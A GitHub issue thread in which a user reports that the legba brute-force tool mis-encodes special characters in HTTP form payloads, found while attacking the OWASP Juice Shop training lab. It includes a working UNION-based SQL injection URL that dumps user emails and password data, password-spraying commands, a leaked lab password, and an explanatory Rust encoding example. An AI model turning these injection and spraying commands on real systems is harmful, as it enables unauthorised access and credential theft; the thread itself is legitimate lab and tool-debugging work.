
http encoding issue #24

Closed
niqdev opened this issue Nov 8, 2023 · 12 comments

niqdev commented Nov 8, 2023

Hi, thanks for the awesome project!

I'm testing legba with my hckops/hckctl tool against the owasp juice shop and it looks like something is wrong with the encoding or escaping of special chars, could you please verify?

This is how I found the issue

# starts juice-shop
hckctl box start vulnerable/owasp-juice-shop

# generates users.txt
curl -sS -H "Accept: application/json" "http://juiceshop:3000/rest/products/search?q=foo%'))+UNION+SELECT+id,username,email,password,role,deluxeToken,totpSecret,isActive,createdAt+FROM+Users;--" | \
  jq -r '.data[].description' > /hck/share/users.txt

cat /hck/share/users.txt
[email protected] # <<<<<<<<<< user with password admin123
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected] # <<<<<<<<<< user with password 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
demo
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]

# password not found
hckctl task legba --inline -- legba http \
  --target http://box-owasp-juice-shop-<RANDOM>:3000/rest/user/login \
  --username /hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'

Official solution https://help.owasp-juice.shop/appendix/solutions.html, search for Dumpster dive the Internet for a leaked password and log in to the original user account it belongs to or the password

In order to exclude that it's an issue with my tool, I built the project locally and this is how I verify it

# password spray with admin123
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password 'admin123' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# prints
# [INFO ] [2023-11-08 09:58:03] (http) <http://localhost:3000/rest/user/login> [email protected] password=admin123

# password spray with 0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB
RUST_LOG=debug ./target/release/legba http \
  --target http://localhost:3000/rest/user/login \
  --username ${HOME}/.local/state/hck/share/users.txt \
  --password '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
  --http-method POST \
  --http-payload 'email={USERNAME}&password={PASSWORD}'
# not found

# I can confirm that the password is valid and solve the challenge with
http http://localhost:3000/rest/user/login email="[email protected]" password='0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB'
{
    "authentication": {
        "bid": 6,
        "token": "<REDACTED>",
        "umail": "[email protected]"
    }
}

I wanted to actually debug it properly, and probably it's because I'm not familiar with Rust, I can build legba disabling the mqtt plugin, but when I'm trying to run it (same error with vscode, intellij, rustrover) I keep getting

thread 'main' panicked at <REDACTED>.cargo/registry/src/index.crates.io-6f17d22bba15001f/clap_builder-4.4.7/src/builder/debug_asserts.rs:275:9:
Command legba: Argument group name must be unique

        'Options' is already in use
stack backtrace:
   0: rust_begin_unwind
             at /rustc/cc66ad468955717ab92600c770da8c1601a4ff33/library/std/src/panicking.rs:595:5

Could you please verify it? I'm more than happy to contribute to the project and open a pr if this is an actual issue.
Thanks!

evilsocket (Owner) commented

Hi, I think you're missing a couple of things :)

It looks like the payload should be {"email": "{USERNAME}", "password": "{PASSWORD}"}:

[Screenshot 2023-11-08 at 12:40:30]

And because of it, a content type header must be added ... this command line works for me:

legba http \
    -T http://localhost:3000/rest/user/login \
    -U [email protected] \
    -P '0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB' \
    --http-method POST \
    --http-payload '{"email": "{USERNAME}", "password": "{PASSWORD}"}' \
    --http-headers "Content-Type=application/json"

[Screenshot 2023-11-08 at 12:42:02]

Am I missing something?

evilsocket (Owner) commented

Yep, can confirm that's also what httpie is sending (it seems it encodes data to json by default if no content-type is provided):

[Screenshot 2023-11-08 at 12:48:17]

niqdev (Author) commented Nov 8, 2023

Thanks for taking the time and look into this, I appreciate your feedback! What probably put me off track is that the admin123 was working 🤷🏻‍♂️

evilsocket (Owner) commented

that's interesting actually ... will try to see why

niqdev (Author) commented Nov 8, 2023

btw, are you setting anything in specific to build the project? I would have figured it out pretty quickly debugging the actual code... if yes could you add it to the wiki?

I had to explicitly disable the mqtt plugin cos it was giving this error

error: failed to run custom build command for `paho-mqtt-sys v0.9.0`

but I didn't find out how to solve the issue with 'Options' is already in use while trying to run/debug the app

evilsocket (Owner) commented

just cargo build --release ... maybe you're missing cmake (that's what's required to build paho-mqtt-sys if I recall correctly)

evilsocket (Owner) commented

AH! turns out you were 100% correct! That password does indeed break the request because it is not correctly encoded (while admin123 works because it doesn't contain special chars):

[Screenshot 2023-11-08 at 13:13:52]

Apparently the page accepts both JSON and normal payload ... my bad man! Will fix ASAP :D thanks for reporting

evilsocket reopened this Nov 8, 2023
evilsocket self-assigned this Nov 8, 2023
evilsocket added the bug (Something isn't working) label Nov 8, 2023
evilsocket (Owner) commented

(in the meantime the json approach is a decent workaround)
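
The failure evilsocket describes above (a form payload that breaks on the special characters in the password while admin123 survives) and the JSON workaround, as an added example that is not part of this thread and not legba's code. It fills the same template used in the reports, email={USERNAME}&password={PASSWORD}, once by plain substitution and once with each value encoded as application/x-www-form-urlencoded, then parses both bodies the way a server does. The e-mail user@example.com is a constructed placeholder (the real account is redacted on this page), the function names are illustrative, and the block does not show legba's actual fix, which is not on the page:

```rust
// Added example, not legba's code. PASSWORD is the juice-shop password quoted in
// this issue; USER is a constructed placeholder for the redacted account.
const USER: &str = "user@example.com";
const SIMPLE_PASSWORD: &str = "admin123";
const PASSWORD: &str = "0Y8rMnww$*9VFYE§59-!Fg1L6t&6lB";
const TEMPLATE: &str = "email={USERNAME}&password={PASSWORD}";

/// Plain substitution: the password's '&' is pasted into the body verbatim.
fn build_form_naive(template: &str, user: &str, pass: &str) -> String {
    template.replace("{USERNAME}", user).replace("{PASSWORD}", pass)
}

/// application/x-www-form-urlencoded encoding of one value: ASCII alphanumerics
/// and "*-._" pass through, space becomes '+', every other byte of the UTF-8
/// encoding becomes %XX. This neutralises '&', '=', '$', '!' and '§'.
fn form_encode(value: &str) -> String {
    let mut out = String::with_capacity(value.len() * 3);
    for b in value.bytes() {
        match b {
            b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'*' | b'-' | b'.' | b'_' => {
                out.push(b as char)
            }
            b' ' => out.push('+'),
            _ => out.push_str(&format!("%{:02X}", b)),
        }
    }
    out
}

/// Substitution with each value encoded first: the behaviour this issue asked for.
fn build_form_encoded(template: &str, user: &str, pass: &str) -> String {
    template
        .replace("{USERNAME}", &form_encode(user))
        .replace("{PASSWORD}", &form_encode(pass))
}

/// Inverse of form_encode, as a server applies it to each key and value.
fn form_decode(s: &str) -> String {
    let bytes = s.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        match bytes[i] {
            b'+' => {
                out.push(b' ');
                i += 1;
            }
            b'%' if i + 2 < bytes.len()
                && bytes[i + 1..i + 3].iter().all(u8::is_ascii_hexdigit) =>
            {
                let hex = std::str::from_utf8(&bytes[i + 1..i + 3]).unwrap();
                out.push(u8::from_str_radix(hex, 16).unwrap());
                i += 3;
            }
            b => {
                out.push(b);
                i += 1;
            }
        }
    }
    String::from_utf8_lossy(&out).into_owned()
}

/// Server-side view of a form body: split on '&', then each pair on the first '='.
fn parse_form(body: &str) -> Vec<(String, String)> {
    body.split('&')
        .filter(|pair| !pair.is_empty())
        .map(|pair| {
            let (k, v) = pair.split_once('=').unwrap_or((pair, ""));
            (form_decode(k), form_decode(v))
        })
        .collect()
}

/// The password the server actually receives from a given body.
fn received_password(body: &str) -> Option<String> {
    parse_form(body)
        .into_iter()
        .find(|(k, _)| k == "password")
        .map(|(_, v)| v)
}

/// The JSON workaround from this thread: JSON has its own escaping, so '&' and
/// '§' need no treatment; only '"', '\\' and control characters do.
fn json_escape(s: &str) -> String {
    let mut out = String::with_capacity(s.len());
    for c in s.chars() {
        match c {
            '"' => out.push_str("\\\""),
            '\\' => out.push_str("\\\\"),
            '\n' => out.push_str("\\n"),
            '\r' => out.push_str("\\r"),
            '\t' => out.push_str("\\t"),
            c if (c as u32) < 0x20 => out.push_str(&format!("\\u{:04x}", c as u32)),
            c => out.push(c),
        }
    }
    out
}

/// Body for --http-payload '{"email": "{USERNAME}", "password": "{PASSWORD}"}'.
fn build_json(user: &str, pass: &str) -> String {
    format!(
        "{{\"email\": \"{}\", \"password\": \"{}\"}}",
        json_escape(user),
        json_escape(pass)
    )
}

fn main() {
    for pass in [SIMPLE_PASSWORD, PASSWORD] {
        let naive = build_form_naive(TEMPLATE, USER, pass);
        let fixed = build_form_encoded(TEMPLATE, USER, pass);
        println!("password  : {}", pass);
        println!("naive body: {}\n  -> server sees {:?}", naive, received_password(&naive));
        println!("fixed body: {}\n  -> server sees {:?}", fixed, received_password(&fixed));
    }
    // Sent with Content-Type: application/json, as in the workaround above.
    println!("json body : {}", build_json(USER, PASSWORD));
}
```

Run it with `rustc` or `cargo run`: for admin123 both bodies yield the same password, which is why that spray worked; for the leaked password the naive body is split at the embedded '&', so the server receives a truncated password plus a stray 6lB field, while the encoded body round-trips exactly. The JSON body only sidesteps the problem because, as noted in the thread, this endpoint accepts both JSON and form payloads, and it still needs the Content-Type=application/json header from the workaround command.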

evilsocket (Owner) commented

pushed the fix, it now works as expected, thanks for reporting!

[Screenshot 2023-11-08 at 13:40:53]

niqdev (Author) commented Nov 8, 2023

awesome, thanks for the quick fix! 🚀

evilsocket (Owner) commented

let me know if i can do anything else to help you integrate with your tool

niqdev (Author) commented Nov 8, 2023

Thanks! It's still early stage and I'm trying to validate a few ideas atm, when I'll get a chance I'd like to see how legba performs on a remote kube cluster with a "real" wordlist...

The idea is basically to abstract where a tool is running and how, to focus on the actual problem. This megalopolis/task/bruteforce/legba is how I defined your tool. I want to build a preset of commands for each tool and the most common use cases. Once I build a solid catalog and I'm familiar with all the tools and attacks I will focus on the orchestration and how to collect/parse/aggregate the results from various tools (which is the easiest part for me)

If you are interested I could add it as alternative way to run it in the installation section or an example page in the wiki to showcase legba against the juice-shop. It's up to you!
